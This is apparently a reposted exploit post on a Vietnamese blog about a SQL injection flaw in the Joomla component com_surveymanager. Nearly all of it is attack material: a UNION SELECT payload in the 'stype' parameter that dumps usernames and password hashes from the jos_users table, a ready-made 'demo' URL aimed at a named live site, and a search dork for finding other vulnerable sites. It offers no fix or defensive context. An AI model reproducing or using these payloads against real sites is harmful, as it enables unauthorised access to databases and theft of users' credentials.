Bug com_surveymanager

Exploit:

index.php?option=com_surveymanager&task=editsurvey&stype=[SQL]
index.php?option=com_surveymanager&task=editsurvey&stype=
-2+union+select+1,concat_ws(0x3a,username,password),3,4,5,6+from+jos_users--

Demo:
http://www.webcopro.com/index.php?option=com_surveymanager&task=editsurvey&stype=
-2+union+select+1,concat_ws%280x3a,username,password%29,3,4,5,6+from+jos_users--

Search: inurl:"com_surveymanager"
By kaMtiEz (kamzcrew@yahoo.com)
  1. Chưa có phản hồi.
  1. No trackbacks yet.

Gửi phản hồi

Mời bạn điền thông tin vào ô dưới đây hoặc kích vào một biểu tượng để đăng nhập:

WordPress.com Logo

Bạn đang bình luận bằng tài khoản WordPress.com Log Out / Thay đổi )

Twitter picture

Bạn đang bình luận bằng tài khoản Twitter Log Out / Thay đổi )

Facebook photo

Bạn đang bình luận bằng tài khoản Facebook Log Out / Thay đổi )

Google+ photo

Bạn đang bình luận bằng tài khoản Google+ Log Out / Thay đổi )

Connecting to %s

%d bloggers like this: